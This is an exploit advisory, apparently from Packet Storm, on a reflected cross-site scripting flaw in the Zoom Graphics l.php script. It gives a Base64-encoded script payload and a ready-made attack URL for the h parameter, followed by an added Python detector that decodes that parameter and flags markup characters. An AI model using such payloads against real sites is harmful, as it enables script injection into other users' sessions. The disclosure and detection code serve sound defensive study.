Zoom Graphics Cross Site Scripting

2012-11-05T00:00:00
ID PACKETSTORM:117890
Type packetstorm
Reporter Avatar Fearless
Modified 2012-11-05T00:00:00

Description

                                        
+---------------------------------------------------------------------------------------------------------+  
# Exploit Title : ZOOM GRAPHICS XSS [B64] Vulnerability   
# Date : 2012-08-19  
# Author : Avatar Fearless   
# Official Site : http://zoom.am/  
# Version : x.x.x [UnKnown]  
# Tested on : Windows 7 Ultimate x32   
# Original Advisory : http://thefear.in/zoomam.txt  
# Contact : avatar@hiphopfan.com   
# Web Sites : http://anti-armenia.org/ || http://millikuvvetler.net/ || http://mexfi.org/  
# Greet`Z To : Meta  
+---------------------------------------------------------------------------------------------------------+  
[+] Vulnerable :  
http://site.tld/l.php?l=2&h=[base64 encode]  
  
  
[-] Exploit :  
First, take an XSS payload, for example: '><script>alert(1);</script>. Only single quotes can be used, not double quotes, because if we use double quotes the script will parse them.  
Then encode the payload to Base64. Output: Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg== The resulting URL will look like this:  
http://site.tld/zoom/l.php?l=2&h=Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg==  
This is just an example.  
  
[?] About :  
For More Info Contact me.  
  
[@]  
Respect To :   
All My Bro*S  
AA Team  
MF Team  
MKT Team  
  
+---------------------------------------------------------------------------------------------------------+  
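
Because the payload travels Base64-encoded in the h parameter, filters that match on the raw query string do not see the markup. The following is an added detection example, not part of the original advisory or the vendor's code: it decodes h on requests to l.php and flags values containing HTML metacharacters. The sample requests are constructed, and the benign value "photo-42" is an assumption about what a legitimate h might carry.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# Characters that let a decoded value break out of an HTML attribute or tag.
MARKUP = re.compile(r"[<>'\"]")

# Constructed sample requests (first one is the URL shown in the advisory).
SAMPLE_REQUESTS = [
    "http://site.tld/zoom/l.php?l=2&h=Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg==",
    "http://site.tld/zoom/l.php?l=2&h=" + base64.b64encode(b"photo-42").decode(),
    "http://site.tld/zoom/l.php?l=2&h=%%%",  # not valid Base64
]


def decode_h(url):
    """Return the Base64-decoded `h` parameter of an l.php request, or None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/l.php"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("h")
    if not values:
        return None
    raw = values[0].replace(" ", "+")  # parse_qs turns '+' into a space
    raw += "=" * (-len(raw) % 4)       # tolerate stripped padding
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def suspicious(url):
    """True when the decoded `h` value contains HTML metacharacters."""
    decoded = decode_h(url)
    return decoded is not None and bool(MARKUP.search(decoded))


def flag_requests(urls):
    """Return (url, decoded value) pairs for requests worth reviewing."""
    return [(u, decode_h(u)) for u in urls if suspicious(u)]


if __name__ == "__main__":
    for url, decoded in flag_requests(SAMPLE_REQUESTS):
        print(f"review: {url}\n  decoded h = {decoded!r}")
```

Detection of this kind complements, and does not replace, HTML-encoding the decoded value wherever l.php writes it into the page.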